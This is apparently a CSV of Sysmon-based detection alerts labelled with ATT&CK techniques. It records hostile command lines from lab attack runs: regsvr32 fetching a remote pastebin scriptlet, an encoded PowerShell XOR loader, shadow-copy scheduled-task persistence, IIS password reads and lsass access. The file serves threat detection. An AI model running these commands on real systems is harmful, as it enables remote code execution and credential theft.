365ABB72-FE7B-5CEB-0000-0010D6820C00 + 4044 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-FE7B-5CEB-0000-0010867F0C00 + 4012 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.041809,2019-05-27T05:29:18.041809+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5910 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.011 + 365ABB72-3D6E-5CEB-0000-00104C83FF00 + 2472 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 17:58:50.075 + 365ABB72-0D5A-5CD7-0000-001069031700 + 2544 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8693-5CD7-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-0D3F-5CD7-0000-00107F541600 + 3212 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 17:58:50.075 + 365ABB72-0D5A-5CD7-0000-001069031700 + 2544 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8693-5CD7-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-0D3F-5CD7-0000-00107F541600 + 3212 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 17:58:50.075 + 365ABB72-0D5A-5CD7-0000-001069031700 + 2544 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8693-5CD7-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-0D3F-5CD7-0000-00107F541600 + 3212 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16792 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.140 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-6693-5CD8-0000-0010AE4C0E00 + 3528 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 18918 + + + + + Microsoft-Windows-Sysmon/Operational + DC1.insecurebank.local + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-05-16 16:08:40.350 + DFAE8213-8B08-5CDD-0000-001011CE0A00 + 3764 + C:\Windows\System32\whoami.exe + 6.3.9600.16384 (winblue_rtm.130821-1623) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + DFAE8213-832F-5CDD-0000-0020E7030000 + 0x3e7 + 2 + System + SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47 + DFAE8213-8B02-5CDD-0000-00109BCA0A00 + 1720 + C:\Windows\System32\osk.exe + "C:\Windows\System32\osk.exe" + +",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16792 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.140 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-6693-5CD8-0000-0010AE4C0E00 + 3528 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16792 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.140 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-6693-5CD8-0000-0010AE4C0E00 + 3528 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243538 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.021 + 747F3D96-9F69-5E75-0000-00106F6A2000 + 2536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1589329703.257302,2020-05-13T04:28:23.257302+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 148597 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-13 00:28:16.115 + 747F3D96-3F20-5EBB-0000-0010035E3600 + 8052 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-3821-5EBB-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-3821-5EBB-0000-001040690000 + 732 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243538 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.021 + 747F3D96-9F69-5E75-0000-00106F6A2000 + 2536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c pause ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 376 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 00:35:07.386 + 365ABB72-47BB-5CE3-0000-00108CAD3E00 + 3176 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /c pause + C:\Users\IEUser\Downloads\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-47BB-5CE3-0000-0010BFA83E00 + 1912 + C:\Users\IEUser\Downloads\com-hijack.exe + "C:\Users\IEUser\Downloads\com-hijack.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243538 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.021 + 747F3D96-9F69-5E75-0000-00106F6A2000 + 2536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969979.57807,2019-05-27T19:12:59.578070+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6193 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:59.510 + 365ABB72-FE7B-5CEB-0000-0010867F0C00 + 4012 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Credential Dumping - Process Access,1552849805.303341,2019-03-17T23:10:05.303341+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10," + + + + + 10 + 3 + 4 + 10 + 0 + 0x8000000000000000 + + + 4442 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 19:10:02.068 + 365ABB72-9B85-5C8E-0000-0010C4CC1200 + 3576 + 3620 + C:\Windows\system32\taskmgr.exe + 365ABB72-0886-5C8F-0000-001030560000 + 476 + C:\Windows\system32\lsass.exe + 0x1fffff + C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Windows\system32\taskmgr.exe+1360e|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557686932.766629,2019-05-12T22:48:52.766629+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16840 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:48:52.344 + 365ABB72-6A94-5CD8-0000-0010C2F10E00 + 3880 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + c:\ProgramData\ + IEWIN7\IEUser + 365ABB72-695E-5CD8-0000-002015370100 + 0x13715 + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-6A94-5CD8-0000-00101BDB0E00 + 1340 + C:\ProgramData\jabber.exe + jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.971708,2019-05-27T05:29:17.971708+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5907 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.931 + 365ABB72-3D6D-5CEB-0000-00108C7FFF00 + 3196 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 